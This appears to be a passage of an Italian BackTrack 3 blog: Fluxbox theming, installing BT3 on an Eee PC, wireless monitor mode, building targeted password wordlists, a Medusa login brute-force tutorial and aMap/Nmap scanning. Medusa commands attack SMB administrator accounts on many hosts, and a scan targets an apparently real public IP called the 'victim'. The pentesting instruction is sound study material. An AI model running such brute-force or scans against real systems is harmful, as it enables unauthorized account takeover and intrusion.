Se ad esempio il tema che stiamo usando , come nel mio proprio caso , è Black_Harmony , apriamolo con SciTE , o un qualsiasi altro editor di testi , e andiamo a modificare la sezione “alpha” , che va dal valore 0 fino a 255 , dove 255 è la trasparenza massima e naturalmente 0 la minima , selezionate la vostra , eventuale , preferenza salvate e vedrete subito la trasparenza applicata al riavvio di Fluxbox. La stessa cosa può essere fatta dallo stesso menù , basta seguire ricorsivamente le indicazioni dei submenu , FluxBox –> Configure –> “…” , e da lì andare ad agire sulla trasparenza della slit , dello stesso menù o della toolbar.

A differenza di Kde e Gnome che sono dei Desktop Manager Fluxbox è un windows manager , quindi non si può nemmeno pensare di installarsi Beryl o Compiz , ma se si vuole e se si trova il pacchetto si può agire sull’ ombreggiatura delle finestre con xcompmngr , pacchetto da cercare perché non ho trovato in repository.

Questa di seguito è l’ ultimo snapshot che pubblico , solo per mostrare la configurazione applicata a GKrellm , la trasparenza inserita in aTerm e vedere come risulta all’ occhio su un desktop come il mio…

***

***

Bene , per quanto riguarda FluxBox , queste sono le principali regole che ho trovato necessario scrivere , poi ognuno ha le sue prerogative e noi siamo sempre quì per fare nuove aggiunte a questo tutorial…

***

Se qualcuno di voi vuole che venga aggiunto un argomento riguardo una sua personalizzazione , siamo quì che aspettiamo il vostro contributo.

ciao a tutti e alla prossima.

BackTrack on eeepc

asus_logo.jpg

Ciao a tutti,questo tutorial è stato scritto e gentilmente offerto da Defcon-69 , (MOD di WiFi-ITA) , lo pubblichiamo con piacere , in modo tale da completare anche tutti i tipi di installazioni possibili della nostra BackTrack.

Continuo lasciandovi alla lettura di questo tutorial ringraziando Defcon-69 e tutti gli amici di WiFi-ITA per la collaborazione mostrata e che sono sicuro durerà nel tempo.

Già da tempo potete trovare il *.pdf del seguente tutorial all’interno del nostro Box-Sharing… …buona lettura.

***

[Installare BT3 LIVE su SD]

Occorrente:

  • – Usb da 2 gb (va bene anche una da 1 gb, ma è meglio una più capiente)
  • – SD da 2 gb
  • – Ovviamente l’eee-pc

Per prima cosa scarichiamo dal nostro Eee, una copia di BT3 (usb version) da uno dei seguenti
mirror:

 

Mirrors:

http://backtrack.mirrors.skynet.be/pub/backtrack/bt3b141207.rar
ftp://ftp.heanet.ie/mirrors/backtrack/bt3b141207.rar
http://ftp.cc.uoc.gr/mirrors/linux/backtrack/bt3b141207.rar
http://ftp.heanet.ie/mirrors/backtrack/bt3b141207.rar
http://backtrack.unixheads.org/
http://ftp.belnet.be/mirror/backtrack/bt3b141207.rar
ftp://ftp.cc.uoc.gr/mirrors/linux/backtrack/bt3b141207.rar
ftp://backtrack.mirrors.skynet.be/pub/backtrack/bt3b141207.rar
http://mirror.switch.ch/ftp/mirror/backtrack/bt3b141207.rar

***

Procedimento:
Una volta scaricata sull’ Eee copiamo le cartelle “boot” e “bt3” nella root della SD, ora apriamo una
shell (CTRL + ALT + T) e digitiamo:

sudo –i
cd /media/MMC-SD/
ls –l
cerchiamo la nostra SD, nel mio caso è “partition1
cd /partition1/boot


Ora siamo nella directory boot!
Ora basta lanciare bash ./bootinst.sh e la nostra SD sarà bootable.

Nota: Se questo procedimento non dovesse andare a buon fine con la SD in Vostro possesso (a
me è capitato con tre SD diverse ), fate così:

– Createvi la USB bootable come spiegato sopra.
– Formattate l’SD con cfdisk rendendola bootable:
– Aprite una shell e digitate:
sudo –i
/sbin/cfdisk –l (cercate il nome della Vostra SD)
/sbin/cfdisk /dev/sdX (dove la X corrisponde alla Vostra SD)
– Selezionate “New” (NB: dopo ogni passaggio qui descritto và premuto invio)
– Selezionate “Primary
– Andate su “Bootable” e premete invio, così da dargli la flag bootable
– Andate su “Type” premete la freccia giu, una sola volta ed inserite “0C”
– Andate su “Write” e premete invio.
Attendete qualche istante… et voilà, SD formattata e bootable.


Bene ora non ci resta che ricopiare le due cartelle “boot” e “bt3” sulla SD e spegnere l’Eee-pc e
rimuovere l’SD.
Inseriamo ora l’USB bootable e avviamo BT3 da live.
Una volta avviato BT3, inseriamo la SD e andiamo nella cartella boot tramite il file manager.
Ora premiamo F4 per aprire una shell di comando, digitiamo:
./bootinst.sh …e seguiamo i soliti comandi.
Una volta terminata l’operazione, avremo la nostra tanto agoniata SD bootable con BT3!!!

[Installare BT3 REAL su SD o su SSD]:

Per chi vuole una versione completa di Back|Track 3 su SD in modo da poterci salvari tutti
dati che vuole senza usare il metodo dei *.lzm, può usare questo metodo:

Occorrente:
– Usb da 2 gb bootable con installato BT3 (vedi inizio)
– SD da 4 gb
– Ovviamente l’eee-pc

Procedimento:
– Avviamo sul nostro Eee, BT3 da USB
– Apriamo una shell e digitiamo fdisk –l per vedere il nome della nostra SD (nel mio caso
l’SD si chiama sda)
– Lanciamo fdisk per partizionare la nostra SD: fdisk /dev/sdX (dove la X corrisponde
alla Vostra SD)
– Premiamo “p” per vedere le partizioni della nostra SD (in teoria dovrebbe essercene una
sola)
– Per cancellarla/e premiamo “d” e scriviamo il numero della pertizione da cancellare, nel mio
caso solo 1.
– Ora creiamo una nuova partizione premendo “n”, poi “p”, poi “1” (Qui vi chiederà quanto
grande volete fare la partizione, lasciate i parametri di default, così da occupare tutti i
cilindri)
– Ora rendiamo bootable la partizione appena creata, premendo “a” e poi “1”
– Adesso basta solo applicare le modifiche fatte premendo “w”, il processo ci impiegherà
qualche istante, dopodiché riavviate BT3.
Una volta riavviato BT3, dobbiamo trasformare la partizione dell’SD in ext3
– Apriamo una shell e digitiamo:

umount /dev/sdX1
mkfs.ext3 /dev/sdX1
cd /tmp
mkdir bt3
mount /dev/sdX1 bt3


Ora possiamo iniziare ad installare Back|Track in versione Real su SD oppure su SSD


Andiamo su K (l’icona in basso a sx) e andiamo su Backtrack/Install Backtrack


Ora basta che guardiate la foto e seguite passo passo ogni signola opzione descritta, l’unica
cosa che dovrete cambiare sarà il nome della vostra SD, la mia come potete vedere è
sda”.
Una volta che avrete la “copia” esatta della foto sul vostro monitor, potrete lanciare
l’installazione.
Ora non basta che aspettare, non spaventatevi se ci mette una vita a caricarsi, è normale.
La prima volta ci ho messo 30 minuti! Un fattore determinante è anche che tipologia di SD
si possiede. Con una SDHC classe 6, l’installazione sarà sicuramente più veloce che con una
classe 4! No?!?

Una volta terminata l’installazione, estraete in modo sicuro la Vostra SD e chiudete BT3.
Reinserite la SD e gustatevi Back|Track da SD in modalità real!

NOTA BENISSIMO

Questo procedimento può essere fatto anche con l’SSD interno del nostro Eee, basta
solo cancellare tutte le partizioni interne dell’SSD e sostituire ai passaggi sopracitati il nome dell’SD con quello dell’SSD (es. sda, con il giusto nome dell’ SSD, che solitamente è /dev/hdc ).

 

Tips and Tricks per migliorare il Vostro BT3:


Avviare BT3 in automatico senza passare da shell:
Editate da shell il file inittab cambiando il numero di default da 3 a 4:
nano /etc/inittab
Ora quando avvierete il vostro BT3 comparirà la GUI e non la shell.
Ridurre i cicli di scrittura nel caso si usi BT3 su SSD:
Aggiungere le seguenti righe al file /etc/fstab con nano (o un altro editor di testo):
nano /etc/fstab
Testo da copiare:
tmpfs /tmp tmpfs defaults,noatime,mode=0777 0 0
tmpfs /var/tmp tmpfs defaults,noatime,mode=0777 0 0
tmpfs /var/log tmpfs defaults,noatime,mode=0777 0 0
Premere poi CTRL + O per salvare e CTRL + X per uscire.

Settare Kismet:
Per settare kismet e renderlo quindi operativo, basta editare il file
/usr/local/etc/kismet.conf con nano (o un altro editor di testo):
nano /usr/local/etc/kismet.conf
Cercare la linea : source=none,none,addone e sostituirla con:
source=madwifi_ag,wifi0,scheda
Premere poi CTRL + O per salvare e CTRL + X per uscire.
Fixare il problema dello spegnimento:
Ad alcuni può capitare che spegnendo BT3, il suo Eee rimanga comunque acceso.
Per ovviare a spegnerlo manualmente ogni volta, basta editare il file /etc/rc.d/rc.6 con
quanto segue:
nano /etc/rc.d/rc.6
Cercare la linea: echo “Unmounting local file systems.”
Copiare: modprobe -r snd_hda_intel appena sopra la line precedente
Premere poi CTRL + O per salvare e CTRL + X per uscire.
Mettere in Monitor Mode la periferica wi-fi
Da shell di comando:
airmon-ng stop ath0
e poi
airmon-ng start wifi0
Per reimpostare la scheda wifi in Managed Mode, invece:
airmon-ng stop ath0
wlanconfig ath create wlandev wifi0
ifconfig ath0 up
Per adesso ho concluso, spero che questa breve guida possa essere stata di qualche aiuto.

Se avete dubbi potete trovarmi sul forum di wifi-ita:

Oppure contattarmi via mail: defcon69 [at] gmail [dot] com (preferisco la prima opzione 😉 )

See u dudes!!!

Wyd e raccolta wordlist

bruteforce02.jpg

Questo tutorial è stato iniziato da pinguinoninja , oggi lo pubbliuco aggiungendoci qualcosina di mio… …anche se non c’é , per ora , il lavoro di pinguinoninja non manca di sicuro , speriamo di ritrovarlo al più presto tra noi , ci mancail suo lavoro , ma soprattutto… …ci manca lui.

Questo tutorial riguarda l’ uso minimo di Wyd e le wordlist , il componimento e , aggiungo , anche la loro raccolta , quindi coloro che volessero contribuire mettendoci altre wordlist , ogni tot mesi le raccoglierò e farò un update del seguente tutorial.

Ma serve davvero un tutorial sulle wordlist?!?

Se vi state ponendo queste domande sappiate che la risposta è molto semplice: ho trovato che la gestione delle wordlist non era semplice come credevo e crearsene una non è una cosa che si fa in “un pò di tempo libero”. Personalmente, come ogni buon niubbo che si rispetti, incontro molte difficolta nella creazione e gestione delle wordlist; per questo motivo penso che altre persone incontrando le mie stesse difficoltà possano aver bisogno di una piccola guida che li aiuti.

[Usare wordlist esistenti]
Di wordlist se ne trovano a bizzeffe sulla rete, su Openwall.com, ad esempio, troviamo molte wordlist divise per lingua e magari anche per categoria. Personalmente ho scaricato le wordlist in cartelle separate dividendole per lingua e le ho unite in un unico file mettendole in ordine ed eliminando le parole ripetute:

————–
cat wordlist1.txt wordlist2.txt > allWord.txt
————–

in questo modo uniamo il contenuto di “wordlist1.txt” e “wordlist2.txt” nel file “allWord.txt”, quindi non ci resta che ordinarlo e “pulirlo” dai doppioni:

————–
cat allWord.txt | sort | uniq > allWordOrd.txt
————–

[Wyd – Generare wordlist da file]
Questo è il metodo più mirato, nel senso che andremo a creare noi la wordlist. Questo significa che se il target è un fanatico del “Signore Degli Anelli” andremo ad inserire all’interno della wordlist solo parole inerenti alla saga aumentando le nostre chance di successo.
Useremo Wyd presente in BT3 di default e sul sito di Remote-Exploit.org. Wyd prende in input un file o una cartella intera e ne estrapola le stringhe di caratteri che possono formare una parola. Prima di inziare vi dico subito che supporta svariati formati per i file di input:

* plain
* html
* php
* doc
* pdf
* mp3
* ppt
* jpeg
* odt / ods / odp

Notate che supporta la maggior parte dei formati che si incontrano navigando nel web, questo significa che se fate il mirroring di un sito sul vostro Hard Disk usando HTTrack o semplicemente wget avrete a disposizione tantissimi file dal quale estrapolare parole da inserire nella vostra lista. Facciamo un esempio (irreale visto che tratteremo wikipedia):

————-
cd ~
wget -r wikipedia.org

————-

lasciamo che wget copleti il download del sito, quindi usiamo wyd:

————-
cd /usr/local/wyd
./wyd.pl -o ~/wordlistWikipedia.txt ~/wikipedia.org/*

————-

Abbiamo creato nella nostra home il file “wordlistWikipedia.txt” che contiene tutto il contenuto dei file presenti dentro la cartella “~wikipedia.org” dentro la quale abbiamo una copia del sito scaricato. A questo punto possiamo benissimo pulire il file come descritto sopra al fine di eliminare i doppioni e ordinarne il contenuto.

[Gestire le wordlist]
Leggendo il forum di Remote-Exploit.org ho letto un post di shamanvirtuel che spiegava il suo metodo per recuperare spazio dalla gestione delle wordlist, ma più in generale questo metodo funziona per ogni tipo di file. Si tratta di comprimere la wordlist creandone un modulo lzm con dir2lzm.
In pratica si crea una cartella e si mette al suo interno la wordlist che vogliamo comprimere:

————–
mkdir wordlist
mv allWord.txt ./wordlist
————–

quindi si comprime la cartella:

————–
dir2lzm ./wordlist wordlistModule.lzm
————–

Abbiamo creato il modulo “wordlistModule.lzm” che possiamo scompattare velocemente nel momento del bisogno usando lzm2dir:

————–
lzm2dir wordlistModule.lzm
————–

Anche se il tempo di creazione del modulo può risultare molto lungo il vantaggio di risparmiare spazio utile sul proprio laptop è moto alto, in questo modo potete trasportare le vostre wordlist più velocemente da un pc ad un altro (io uso il fisso per creare wordlist perchè è più potente e quindi veloce, al momento del bisogno le passo sul notebook).

Proprio ieri -=Xploitz=- , sul forums.remote-exploit , ha postato due torrent , (reperibili quì…) , che contengono tutte le wordlist raccolte durante il tempo intercorso su altri due post , chi possiede le wordlist inserite nel box del nostro blog le cancelli visto che le ho postate lì la granparte , ma i torrent per coloro che desiderano una wordlist eccezionale sono indispensabili.

Quindi grazie a shamanvirtuel a pureh@te a -=Xploitz=- e a tutto il forums.remote-exploit

Ma torniamo a noi , i due torrent racchiudono quasi 4 GigaBytes di wordlist scompattate , mentre zippate sono circa 350 MegaBytes

Tutti coloro che da oggi hanno scaricato e controllato le wordlist proveniente dai due torrent appena linkti se trovano altre wordlist e vogliono aggiungerle possono farlo benissimo linkandoci l’ url in un commento o  contattandoci nella pagina /c0ntacts ci sono

Medusa -login bruteforcer [+video]

themedusa.jpg
***

Ciao a tutti,

eccoci arrivati a descrivere e a testare un altro tool , inserito in BackTrack nella sezione del “Privilege Escalation” , il tool di cui stiamo parlando , già dalla foto , è il Medusa

…ma cosa è Medusa?
Medusa è un login brute-forcer veloce, modulare, parallelo per servizi di
rete , creato da the geeks [Foofus.net].

Il nome Medusa , deriva proprio dall’obbiettivo principale dei creatori di questo tool , e cioè:

il supporto di quanti più servizi di rete possibili che richiedano l’autenticazione da remoto verso un unico host da attaccare.

I creatori di Medusa individuano 3 caratteristiche principali attribuibili al tool:

Può essere utilizzato contro più hosts, users o passwords contemporaneamnte;

  • -Flessibilità dell’input: le informazioni sull’obbiettivo possono essere fornite al

tool in vari modi e ogni attacco può essere diretto a una sola vittima
o a più vittime contemporaneamente;

  • design modulare: ogni modulo è presente come un file *.mod indipendente.

Ciò significa che non è necessaria alcuna modifica al “core” del tool per implementare
altre funzioni inizialmente non supportate da Medusa.

Passiamo ora all’uso più prettamente pratico del tool in questione:

Per visualizzare tutte le opzioni che Medusa supporta ci basta digitare
%medusa


l’output sarà:


bt ~ # medusa
Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ALERT: Host information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT] : Target hostname or IP address
-H [FILE] : File containing target hostnames or IP addresses
-u [TEXT] : Username to test
-U [FILE] : File containing usernames to test
-p [TEXT] : Password to test
-P [FILE] : File containing passwords to test
-C [FILE] : File containing combo entries. See README for more information.
-O [FILE] : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT] : Name of the module to execute (without the .mod extension)
-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a
different parameter each time and they will all be sent to the module (i.e.
-m Param1 -m Param2, etc.)
-d : Dump all known modules
-n [NUM] : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process
the entire username before proceeding.
-f : Stop scanning host after first valid username/password found.
-F : Stop audit after first valid username/password found on any host.
-b : Suppress startup banner
-q : Display module’s usage information
-v [NUM] : Verbose level [0 – 6 (more)]
-w [NUM] : Error debug level [0 – 10 (more)]
-V : Display version

Ora possiamo visualizzare tutti i moduli che sono già implementati all’ interno di Medusa con la
versione installata indicata a lato , diamo quindi da shell il seguente comando:

bt~# medusa -d

ed il nostro sistema ci elencherà i moduli disponibili…

bt ~ # medusa -d
Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

Available modules in “.” :

Available modules in “/usr/local/lib/medusa/modules” :
+ cvs.mod : Brute force module for CVS sessions : version 1.0.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 1.3.0
+ http.mod : Brute force module for HTTP : version 1.3.0
+ imap.mod : Brute force module for IMAP sessions : version 1.1.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1
+ mysql.mod : Brute force module for MySQL sessions : version 1.2
+ nntp.mod : Brute force module for NNTP sessions : version 0.9
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2
+ pop3.mod : Brute force module for POP3 sessions : version 1.1.1
+ postgres.mod : Brute force module for PostgreSQL sessions : version 1.0.0
+ rexec.mod : Brute force module for REXEC sessions : version 1.1.1
+ rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2
+ rsh.mod : Brute force module for RSH sessions : version 1.0.1
+ smbnt.mod : Brute force module for SMB/NTLMv1 sessions : version 1.3.1
+ smtp-auth.mod : Brute force module for SMTP Authentication with TLS : version 0.9.1
+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 0.9.1
+ snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0
+ ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2
+ svn.mod : Brute force module for Subversion sessions : version 1.0.0
+ telnet.mod : Brute force module for telnet sessions : version 1.2.1
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 1.0.0
+ vnc.mod : Brute force module for VNC sessions : version 1.0.1
+ web-form.mod : Brute force module for web forms : version 0.9
+ wrapper.mod : Generic Wrapper Module : version 1.0.1

Per visualizzare le opzioni riguardanti ciascun modulo è sufficiente digitare:
medusa -M nomemodulo -q

esempio: medusa -M mysql -q (Il modulo utilizzato in questo esempio è mysql.mod)


L’output sarà il seguente:

bt ~ # medusa -M mysql -q
Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

mysql.mod (1.2) JoMo-Kun <jmk@foofus.net> :: Brute force module for MySQL sessions

Available module options:
PASS:? (PASSWORD*, HASH)
PASSWORD: Use normal password.
HASH: Use a hash rather than a password. (non-SHA1 hashes only)

(*) Default value

Usage examples:

1: Normal boring check…
medusa -M mysql -h somehost -u someuser -p somepassword

2: Using an old-style MySQL hash…
medusa -M mysql -h somehost -U users.txt -p 39b52a209cf03d62 -m PASS:HASH

Andiamo avanti con il nostro tutorial per capire effettivamente come funziona
Medusa.

Eseguiamo un attacco:
i comandi che seguono servono a Medusa per testare tutte le password contenute nel
file che chiemrò “passwords.txt” contro un singolo user (administrator) sull’host 192.168.0.20 attraverso il protocollo SMB.
I comandi dati dovrebbero essere chiari mentre per l’ -e ns , che non è assolutamente
da tralasciare , serve un’ulteriore spiegazione. Questi infatti serve a per far eseguire al
tool un controllo supplementare , controllo che andrà a verificare che l’administrator abbia lasciato in bianco il campo “password” oppure nel caso in cui “password” e “username” siano gli stessi.

***

bt~# medusa -h 192.168.0.20 -u administrator -P passwords.txt -e ns -M smbnt

Medusa v1.0-rc1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: (1/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: administrator (2/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: password (3/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass1 (4/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass2 (5/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass3 (6/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass4 (7/7)

***

L’attacco è stato effettuauto.

La riga di comando in basso ci mostra la funzionalità di Medusa per quanto riguarda l’attacco
parallelo. Qui almeno 20 hosts e 10 users sono attaccati contemporaneamente. L’istruzione -L serve per far
controllare a Medusa un solo username di ogni host specificato.

medusa -H hosts.txt -U users.txt -P passwords.txt -T 20 -t 10 -L -F -M smbnt

Medusa è stata progettata per ricevere da input host/username/password, dati che possono essere usati in un file detto “combo” file , ovvero combinato.

Un file combo può essere specficato tramite l’opzione “-C“.
Il file deve avere i valori formattati per colonna in questo modo:
host:user:password
Se uno dei 3 valori viene lasciato vuoto, la rispettiva informazione deve essere fornita o attraverso una
valutazione globale o attraverso un’apposita lista contenuta in un altro file.
Medusa provvederà a un controllo dei parametri utilizzando la prima riga del file fornitogli.

Le combinazioni utilizzabili in un combo file sono le seguenti:

host:username:password
host:username:
host::
:username:password
:username:
::password
host::password

Quindi riportiamo di seguito il comando per un semplice attacco che controllerà ogni voce riportata
in un combo file:

medusa -M smbnt -C combo.txt

il file combo:
192.168.0.20:administrator:password
192.168.0.20:testuser:pass
192.168.0.30:administrator:blah
192.168.0.40:user1:foopass

Mentre l’esempio succesivo servirà per controllare ogni voce del file combo.txt contro gli obbiettivi
in lista nel file “hosts.txt“.

medusa -M smbnt -C combo.txt -H hosts.txt

il file combo.txt:
administrator:password
testuser:pass
administrator:blah
user1:foopass

Medusa inoltra supporta i files PwDump come combo file; la formattazione di questi file deve essere la
seguente:
user:id:lm:ntlm:::
Medusa cerca ::: alla fine della prima linea per determinare se il file contiene un output PwDump.

***

***

Parlando del Medusa , quì nel «back|track~blog , non è la prima volta che parliamo di Password-Attack , infatti prima di questo tool abbiamo trattato l’ Hydra , attualmente sempre in backtrack , ma visto che su Hydra di video in rete già se ne tovano , abbiamo realizzato un video usando come tool appunto Medusa… …per coloro che volessero vederne le differenze posso recarsi a quest’ indirizzo.

Dal video potete vedere benissimo che abbiamo realizzato due tipi di attacco con Medusa , entrambi diretti su di un unico host , determinato tramite IP , dove la prima volta per effettuare l’ attacco usufruisco di quattro files di testo , hosts.txt [opzione -H] , pass.txt [opzione -P] , user.txt [opzione -U] , e res.txt [opzione -O] , per ottenere il risultato in un file di testo.

Dal video , nel primo caso otteniamo il risultato dal valore immesso tra le parentesi da Medusa , [ad esempio (1/7)] , che ha successo con la prima stringa (1) immessa nel file ; nel secondo caso invece utilizzo un file combo , che contiene le stesse informazioni dei files precedenti , naturalmente inseriti come da spiegazione descritta sopra.

Entrambe riportano come password la stringa “brigante“.

Tutti i files sono contenuti nella directory “/” , in modo da non dover digitare da shell tutti i percorsi dove i files *.txt sono contenuti.
…ciao a tutti e alla prossima.

RedBaron & brigante~

aMap -Service Fingerprinting-

loginhelp.gif

Ciao a tutti,

eccoci arrivati a fare una buona descrizione di un altro tool della nostra BackTrack , tool che riguarda il portscanning , e tra i più innovativi in circolazione… …stiamo parlando di aMap , ovvero un altro degli ottimi prodotti inseriti in BackTrack creato dal team di The Hacker’s Choise , di cui i più assidui lettori del nostro blog hanno già letto spesso.

AMap è un portscan di nuova generazione, il suo ruolo è principalmente quello di supporto al penetration-testing.

La caratteristica principale di AMap è quella di assumere specifiche tecniche di scanning che ci permettono di venire a conoscenza se su di un determinato host ci sono delle applicazioni che lavorano su determinate porte , anche se le porte non sono quelle che le applicazioni supportano per default.

AMap è infatti considerato tra i migliori Service Fingerprinting in circolazione.

Il Service Fingerprinting è di fondamentale importanza per una distro dedicata al pentesting come BackTrack , fate ad esempio il caso che si debba testare la sicurezza di un determinato host , su cui girano delle specifiche applicazioni , e noi ci troviamo di fronte alla scelta del “come iniziare a testare la sicurezza dell’ host” , e prendiamo come riferimento iniziale del nostro pentesting il Metasploit Framework , ma possiamo iniziare direttamente con Metasploit?

La risposta ovviamente è no , prima di passare alla decisione di usare Metasploit dovremmo capire cosa gira sull’ host , e quali sono le falle , le vulnerabilità di cui l’ host è afflitto , ed è in questi casi che aMap si rivela una soluzione eccezionale.
Oggigiorno i 2 tool più utilizzati per lo scanning sono: AMap e NMap. Entrambi hanno propri punti di forza e punti di debolezza dato che utilizzano tecniche differenti ma è consigliabile utilizzarli entrambi congiuntamente per ottenere il massimo dei risultati e dell’ affidabilità. Tutto questo naturalmente lo dovremmo fare sapendo che l’ utilizo di aMap è fatto per rivolgere l’ attenzione più che altro verso le applicazioni , nMap invece viene utilizzato per tutto il rimanente , ed è per questo che un utilizzo combinato potrebbe rivelarsi preziosissimo.

Senza database con i dati necessari , (invio / richieste dati) , il tool non avrebbe alcun valore , proprio per questo gli sviluppatori richiedono agli utenti un supporto inviando le proprie informazioni , per rendere il tool quanto più completo possibile.
Vediamo in che modo agisce AMap:

Come tutti gli scanning , aMap ottiene informazioni , attraverso l’ invio e la ricezione di segnali , pacchetti , al momento in cui amap ottiene le risposte , queste vengono confronate con liste di stringhe ed in base al risultato di questo confronto viene stabilito il programma in esecuzione , servendoci quindi le informazioni che noi richiediamo… …ad esempio con AMap si può identificare un server SSL in esecuzione sulla porta 3442 come anche un Oracle listener in esecuzione sulla porta 23.

Per ottenere tutte le opzioni possibili con AMap basta digitare amap -h da shell ed è questo il suo output:

[root@bt bin]$ amap -h
amap v5.2 (c) 2005 by van Hauser <amap-dev@thc.org> http://www.thc.org/thc-amap
Syntax: amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] …]
Modes:
-A Map applications: send triggers and analyse responses (default)
-B Just grab banners, do not send triggers
-P No banner or application stuff – be a (full connect) port scanner
-W Web Update – online update the application fingerprint database!
Options:
-1 Only send triggers to a port until 1st identification. Speeeeed!
-6 Use IPv6 instead of IPv4
-b Print ascii banner of responses
-i FILE Nmap machine readable outputfile to read ports from
-u Ports specified on commandline are UDP (default is TCP)
-R / -S Do NOT identify RPC / SSL services
-H Do NOT send application triggers marked as potentially harmful
-U Do NOT dump unrecognised responses (better for scripting)
-d Dump all responses
-v Verbose mode, use twice (or more!) for debug (not recommended 🙂
-q Do not report closed ports, and do not print them as unidentified
-o FILE [-m] Write output to file FILE, -m creates machine readable output
-c CONS Amount of parallel connections to make (default 32, max 256)
-C RETRIES Number of reconnects on connect timeouts (see -T) (default 3)
-T SEC Connect timeout on connection attempts in seconds (default 5)
-t SEC Response wait timeout in seconds (default 5)
-p PROTO Only send triggers for this protocol (e.g. ftp)
TARGET PORT The target address and port(s) to scan (additional to -i)
amap is a tool to identify application protocols on target ports.
Usage hint: Options “-bqv” are recommended, add “-1” for fast/rush checks.

AMap accetta come input anche i files -oM , ovvero quei files che Nmap restituisce come output.
Per eseguire una scansione si può digitare l’ indirizzo IP di un solo host , si possono specificare delle porte , ma visto che abbiamo accennato all’ utilizzo combinato di aMap con nMap facciamone un esempio.
Innanzitutto eseguiamo una scansione con Nmap digitando i comandi sotto riportati dopo aver
aperto AMap , eccovi l’ esempio:
nmap -sS -oM results.nmap -p 1-100 87.11.159.117

dove:

-sS –> è il tipo di scansione
-oM results.nmap –> salva l’output nel file results.nmap
-p 1-100 –> è l’intervallo delle porte da scansionare
87.11.159.117 –> è l’indirizzo ip della vittima


Questo l’ output restituito:

***


bt bin # nmap -sS -oM results.nmap -p 1-100 87.11.159.117

Starting Nmap 4.50 ( http://insecure.org ) at 2008-03-13 23:47 GMT
Interesting ports on host117-159-dynamic.11-87-r.retail.telecomitalia.it (87.11.159.117):
Not shown: 99 filtered ports
PORT STATE SERVICE
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 4.797 seconds

***

Dall’output possiamo ben capire che abbiamo trovato una porta aperta nell’intervallo che va da 1 a 100 sull’ host della nostra potenziale vittima.

Ora possiamo avviare la nostra scansione con AMap.
Per eseguire la scansione con aMap ed ottenere il massimo dei risultati , ci affidiamo all’ utilizzo di aMap , sfruttando l’ output che in precedenza ci ha restituito nMap

…Quindi:
bt~# amap -i results.nmap -o results.amap -m


Dove:
-i –> dice ad AMap che utilizzeremo un file di output di nMap
results.nmap –> è il nome del file di output di nMap
-o e -m –> sono opzioni che riguardano la creazione di un file di output di AMap
results.amap –> è il nome del file di output che verrà prodotto da AMap


Questo è l’output:

***

bt bin # amap -i results.nmap -o results.amap -m
Warning: output file already exists. Moving to results.amap.old
amap v5.2 (www.thc.org/thc-amap) started at 2008-03-13 23:48:12 – MAPPING mode

Protocol on 87.11.159.117:80/tcp matches http
Protocol on 87.11.159.117:80/tcp matches webmin

Unidentified ports: none

amap v5.2 finished at 2008-03-13 23:48:21

***

Come possiamo vedere dall’output che AMap ci ha fornito , notiamo in esecuzione sul’ip della
vittima “http” e “webmin” entrambi sulla porta 80.

Solo tool come aMap avrebbero potuto rivelarciinfomazioni del genere , metterci al corrente della presenza di webmin è importante perché durante un attività di pentesting avremmo potuto ad esempio decidere di analizzare ed utilizzare un exploit dedicato appunto al webmin.

Ma torniamo al nostro aMap…

Naturalmente è possibile utilizzare AMap anche soltanto indicando l’host o l’ip vittima come in
questo caso:
%amap 87.11.159.117 80
Con questo comando diciamo ad AMap di scansionare la porta 80 sull’ip 87.11.159.117
L’output sarà il seguente:

bt bin # amap 87.11.159.117 80
amap v5.2 (www.thc.org/thc-amap) started at 2008-03-14 00:05:36 – MAPPING mode

Protocol on 87.11.159.117:80/tcp matches http
Protocol on 87.11.159.117:80/tcp matches webmin

Unidentified ports: none.

amap v5.2 finished at 2008-03-14 00:05:45

Si può naturalmente effettuare una scansione prendendo in considerazione un range di porte , come in questo caso in cui l’intervallo è rappresenatto da 50-100:
bt~# amap 87.11.159.117 50-100

Eccovi ora alcuni consigli a riguardo di qualche opzione…

Attivando:
-1 avrete una scanione molto veloce;
-q nasconde i messaggi riguardanti le porte chiuse;
-v (verbose) , ovvero la modalità verbose , ossia ottenere le informazioni live , subito , nella shell

Per fare una scansione delle porte davvero veloce , (ma che va a discapito della qualità delle informazioni che si ricevono) , e sapere il banner in ascolto sulla porta basta digitare:
